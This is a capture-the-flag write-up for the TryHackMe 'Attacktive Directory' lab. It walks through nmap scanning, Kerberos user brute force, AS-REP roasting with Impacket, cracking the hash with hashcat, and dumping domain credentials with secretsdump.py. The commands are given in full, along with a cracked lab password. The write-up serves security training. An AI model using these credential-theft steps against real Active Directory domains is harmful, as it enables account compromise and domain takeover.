This is free machine from THM which covers Active Directory. This room will also give you great hands on usage of Impacket tool. Let’s Begin.
First, let’s scan this target using nmap.
nmap -sC -sV <IP>
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_ Potentially risky methods: TRACE
|http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-10-18 04:24:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | Product_Version: 10.0.17763 | System_Time: 2021-10-18T04:24:20+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-10-17T04:06:58
|_Not valid after: 2022-04-18T04:06:58
|_ssl-date: 2021-10-18T04:24:28+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_ Message signing enabled and required
| date: 2021-10-18T04:24:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.92 seconds
As we can see, plethora of ports is open including Kerberos. let’s use kerbrute to perform brute force. Before using this command make sure you have added your target IP to /etc/hosts with domain spookysec.local. Userlist and Passwordlist is already shared by creator.
To get the ASReproastable account from Key Distribution Centre,we will use GetNPUsers.py from Impacket.
python3 GetNPUsers.py -dc-ip spookysec.local spookysec.local/ -usersfile ~/THM/Attacktivedirec/user.txt -no-pass
Copy this hash and use hashcat to crack it.
hashcat -a 0 -m 18200 hash.txt passwordlist.txt --force
svc-admin: management2005 we will use this credential to check the shares on domain controller.
smbclient -L \\\\IP\\ -U 'svc-admin' -P 'management2005'
Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes. Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.”
let’s use secretsdump.py
python3 secretsdump.py spookysec.local/backup:email@example.com -just-dc-user Administrator
This output gave us Administrator credentials,Now we can use this to get admin access using winrm.